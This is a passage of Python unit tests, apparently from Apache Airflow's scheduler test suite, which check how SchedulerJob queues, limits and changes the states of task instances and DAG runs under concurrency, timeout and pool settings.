session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
assert mock_queue_command.called
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# It is important that len(tasks) is less than concurrency, because
# previously scheduler._execute_task_instances only checked the number of
# tasks once, so if concurrency was 3 we could execute arbitrarily many
# tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# It is important that len(tasks) is less than concurrency, because
# previously scheduler._execute_task_instances only checked the number of
# tasks once, so if concurrency was 3 we could execute arbitrarily many
# tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
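# max_tis_per_query only limits the batch size per query; all eight
# scheduled TIs should still be queued and counted in the return value.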
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
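# Leave a stale entry in the executor's queued_tasks; the key has the same
# shape as TaskInstance.key: (dag_id, task_id, execution_date, try_number).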
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
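# On start-up the scheduler resets orphaned SCHEDULED TIs of regular dag
# runs back to NONE, but TIs belonging to backfill runs are left untouched.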
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create the scheduler and mock calls to the processor. The poll interval
# is 0 to avoid sleeping, and the processor's done flag is set to True so
# the loop exits after a single pass.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_root_after_dagrun_unfinished(self):
"""
DagRuns with one successful and one future root task -> SUCCESS
Note: the DagRun state may still be RUNNING during CI.
"""
dag_id = 'test_dagrun_states_root_future'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id, num_runs=2)
# we can't use dag.run or evaluate_dagrun because it uses BackfillJob
# instead of SchedulerJob and BackfillJobs are allowed to not respect start dates
scheduler.run()
first_run = DagRun.find(dag_id=dag_id, execution_date=DEFAULT_DATE)[0]
ti_ids = [(ti.task_id, ti.state) for ti in first_run.get_task_instances()]
self.assertEqual(ti_ids, [('current', State.SUCCESS)])
self.assertIn(first_run.state, [State.SUCCESS, State.RUNNING])
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
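# Whether the TI is brand new (NONE) or its retry/reschedule window has
# already elapsed, _process_task_instances should put it back on the queue.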
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if its dagrun_timeout has passed
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_active_runs
has been reached and dagrun_timeout has not been reached,
and that a dagrun will be scheduled if max_active_runs has
been reached but dagrun_timeout has also been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
